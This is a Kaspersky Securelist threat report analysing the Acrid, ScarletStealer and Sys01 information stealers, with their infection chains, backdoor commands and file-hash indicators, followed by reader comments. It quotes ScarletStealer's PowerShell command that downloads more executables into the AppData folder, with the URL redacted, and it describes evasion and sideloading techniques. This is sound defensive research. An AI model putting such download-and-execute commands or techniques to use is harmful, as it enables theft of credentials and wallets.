Stealers, stealers and more stealers

Crimeware report: Acrid, ScarletStealer and Sys01 stealers | Securelist Subscribe --> Dark mode off Login --> Securelist menu English Russian Spanish Brazil Existing Customers Personal My Kaspersky Renew your product Update your product Customer support Business KSOS portal Kaspersky Business Hub Technical Support Knowledge Base Renew License Home Products Trials&Update Resource Center Business Kaspersky Next Small Business (1-50 employees) Medium Business (51-999 employees) Enterprise (1000+ employees) Securelist Threats Financial threats Mobile threats Web threats Secure environment (IoT) Vulnerabilities and exploits Spam and Phishing Industrial threats Categories APT reports Incidents Research Malware reports Spam and phishing reports Publications Kaspersky Security Bulletin Archive All Tags APT Logbook Webinars Statistics Encyclopedia Threats descriptions KSB 2021 About Us Company Transparency Corporate News Press Center Careers Sponsorships Policy Blog Contacts Partners Find a Partner Partner Program Content menu Close Subscribe Table of Contents Introduction Acrid ScarletStealer Sys01 Conclusion Indicators of compromise Authors GReAT Introduction Stealers are a prominent threat in the malware landscape. Over the past year we published our research into several stealers (see here , here and here ), and for now, the trend seems to persist. In the past months, we wrote several private reports on stealers as we discovered Acrid (a new stealer), ScarletStealer (another new stealer) and Sys01, which had been updated quite a bit since the previous public analysis . To learn more about our crimeware reporting service, you can contact us at [email protected] . Acrid Acrid is a new stealer found last December. Despite the name, it has nothing in common with the AcridRain stealer . Acrid is written in C++ for the 32-bit system, despite the fact that most systems are 64 bit these days. Upon closer inspection of the malware, the reason for compiling for a 32-bit environment became clear: the author decided to use the “Heaven’s Gate” technique. This allows 32-bit applications to access the 64-bit space to bypass certain security controls. “Heaven’s Gate” technique implementation in Acrid stealer In terms of functionality, the malware embeds the typical functionality one might expect from a stealer: Stealing browser data (cookies, passwords, login data, credit card information, etc.); Stealing local cryptocurrency wallets; Stealing files with specific names (e.g. wallet.dat, password.docx, etc.); Stealing credentials from installed applications (FTP managers, messengers, etc.). Collected data is zipped and sent to the C2. The malware is of medium sophistication. It has a certain degree of complexity, such as string encryption, but lacks any innovative features. ScarletStealer Last January, we analyzed a downloader we dubbed “Penguish”, which we described in detail in a private report. One of the payloads it downloaded was a previously unknown stealer we call “ScarletStealer”. ScarletStealer is a rather odd stealer as most of its stealing functionality is contained in other binaries (applications and Chrome extensions) that it downloads. To be more precise, when ScarletStealer is executed, it checks for the presence of cryptocurrencies and crypto wallets by checking certain folder paths (e.g. %APPDATA%\Roaming\Exodus). If anything is detected, it starts to download the additional executables using the following PowerShell command: powershell.exe -Command "Invoke-WebRequest -Uri 'https://.........exe' - OutFile $env:APPDATA\\.........exe 1 2 powershell . exe - Command " Invoke - WebRequest - Uri 'https://.........exe' - OutFile $ env : APPDATA \ \ . . . . . . . . . exe Among the binaries it downloads are metaver_.exe (used to steal content from Chrome extensions), meta.exe (modifies the Chrome shortcut, so the browser is launched with a malicious extension), and others. Most of the ScarletStealer executables are digitally signed. Metamask grabbing function The stealer is very underdeveloped in terms of functionality and contains many errors, flaws and redundant code. For example, the malware tries to gain persistence on the system by creating a registry key for autorun. The registry key contains the path to the file Runtimebroker_.exe , but we did not find any code in any of the files involved in the infection that would store at least one executable file with that name. Therefore, it is rather odd that this stealer is distributed through a long chain of downloaders, where the last one is the Penguish downloader, and signed with a digital certificate. One would expect that all this effort would result in a more advanced stealer than ScarletStealer. ScarletStealer victims are mostly located in Brazil, Turkey, Indonesia, Algeria, Egypt, India, Vietnam, the USA, South Africa and Portugal. Sys01 SYS01 (also known as “Album Stealer” or “S1deload Stealer”) is a relatively unknown stealer that has been around since at least 2022. It has been described by Bitdefender , Zscaler and Morphisec . In their reports, you can follow its evolution from a C# stealer to a PHP stealer. When we started to look into this campaign we noticed a combination of the two, a C# and PHP payload. One thing that has not changed is the infection vector. Users are still tricked into downloading a malicious ZIP archive disguised as an adult video via a Facebook page: Ad for the malicious ZIP archive on a compromised facebook page The archive contains a legitimate binary — in this case WdSyncservice.exe, renamed to PlayVideoFull.exe — that sideloads a malicious DLL named WDSync.dll. The DLL opens an adult-themed video and executes the next payload, which is a malicious PHP file encoded with ionCube . The executed PHP file calls a script, install.bat, which ultimately runs the next stage by executing a PowerShell command. This layer is conveniently named runalayer and runs what seems to be the final payload called Newb . There is, however, a difference between the latest version of the stealer and the previous publicly disclosed versions, which consists in the split of functionality. The stealer as it is now ( Newb ), contains functionality to steal Facebook-related data and to send stolen browser data, located and organized in a specific directory structure to the C2. It also has backdoor functions, and it can execute the following commands, among others: Command Description dll Download file, kill all the specified processes and start a new process using PowerShell (the command decrypts, unzips and executes the specified file). The PowerShell routine is similar to the routines observed earlier. cmd Kill a list of specified processes and start a new process. dls Download a file, kill all the specified processes and start a new specified process. But the code that actually collects the browser data Newb sends to C2 was found in a different sample named imageclass . We were not able to determine with 100% certainty how imageclass was pushed to the system, but looking at the backdoor code of Newb , we concluded with a high degree of certainty that imageclass was later pushed through Newb to the infected machine. The initial ZIP archive also contains another malicious PHP file: include.php . This file has similar backdoor functionality to Newb and accepts many of the same commands in the same format. Victims of this campaign were found all over the world, but most of them were located in Algeria (a bit over 15%). This most likely has to do with the infection vector as it can be heavily localized. We also noticed that the malware authors have a preference for .top TLDs. Conclusion Stealers are a prominent threat that is here to stay. In this post, we have discussed an evolution of a known stealer, as well as two completely new stealers with different levels of complexity. The fact that new stealers appear every now and then, combined with the fact that their functionality and sophistication varies greatly, indicates that there is a criminal market demand for stealers. The danger posed by stealers lies in the consequences. This malware steals passwords and other sensitive information, which later can be used for further malicious activities causing great financial losses among other things. To protect yourself against stealers and other threats, it is essential to follow a number of basic hygiene rules. Always update your software with the latest security patches, don’t download any files from dubious sources, don’t open attachments in suspicious emails, etc. Finally, if you want to be even more sure, a security solution, such as our SystemWatcher component, that looks at the behavior of events on your machine can help to protect your system as well. If you would like to stay up to date on the latest TTPs being used by criminals, or if you have questions about our private reports, you can contact us at [email protected] . Indicators of compromise Acrid abceb35cf20f22fd8a6569a876e702cb 2b71c81c48625099b18922ff7bebbf51 b9b83de1998ebadc101ed90a6c312da8 ScarletStealer 1d3c3869d682fbd0ae3151b419984771 c0cf3d6d40a3038966f2a4f5bfe2b7a7 f8b2b941cffb9709ce8f422f193696a0 Sys01 0x6e2b16cc41de627eb7ddcd468a037761 0x21df3a69540c6618cfbdaf84fc71031c 0x23ae473bc44fa49b1b221150e0166199 Malware Technologies Malware Descriptions Malware Trojan Data theft Trojan-stealer crimeware Stealers, stealers and more stealers Your email address will not be published. Required fields are marked * Name * Email * Cancel Δ This site uses Akismet to reduce spam. Learn how your comment data is processed. Why does Kaspersky struggle so much against Infostealers?? There have been plenty of infostealers that stay undetected and would have wrecked havoc on my machine if I hadn’t configured Intrustion Prevention to place unknown files in High Restricted and denied their Write/Modify/Create/Delete rights. Reply Hi Mumukshu! If you are Kaspersky customer, and our solution doesn’t detect malware on your device, please, share the details with our support team: https://support.kaspersky.ru/b2c/ Thank you for flagging! Reply Table of Contents Introduction Acrid ScarletStealer Sys01 Conclusion Indicators of compromise From the same authors In the same category Latest Posts Latest Webinars Reports Kaspersky researchers analyze updated CoolClient backdoor and new tools and scripts used in HoneyMyte (aka Mustang Panda or Bronze President) APT campaigns, including three variants of a browser data stealer. Kaspersky discloses a 2025 HoneyMyte (aka Mustang Panda or Bronze President) APT campaign, which uses a kernel-mode rootkit to deliver and protect a ToneShell backdoor. Kaspersky GReAT experts analyze the Evasive Panda APT’s infection chain, including shellcode encrypted with DPAPI and RC5, as well as the MgBot implant. Kaspersky expert describes new malicious tools employed by the Cloud Atlas APT, including implants of their signature backdoors VBShower, VBCloud, PowerShower, and CloudAtlas. Subscribe to our weekly e-mails The hottest research right in your inbox Email (Required) (Required) I agree to provide my email address to “AO Kaspersky Lab” to receive information about new posts on the site. I understand that I can withdraw this consent at any time via e-mail by clicking the “unsubscribe” link that I find at the bottom of any e-mail sent to me for the purposes mentioned above. Subscribe Δ Threats Threats APT (Targeted attacks) Secure environment (IoT) Mobile threats Financial threats Spam and phishing Industrial threats Web threats Vulnerabilities and exploits All threats Categories Categories APT reports Malware descriptions Security Bulletin Malware reports Spam and phishing reports Security technologies Research Publications All categories Other sections Archive All tags Webinars APT Logbook Statistics Encyclopedia Threats descriptions KSB 2025 Kaspersky ICS CERT © 2026 AO Kaspersky Lab. All Rights Reserved. Registered trademarks and service marks are the property of their respective owners. Privacy Policy Terms of use License Agreement Cookies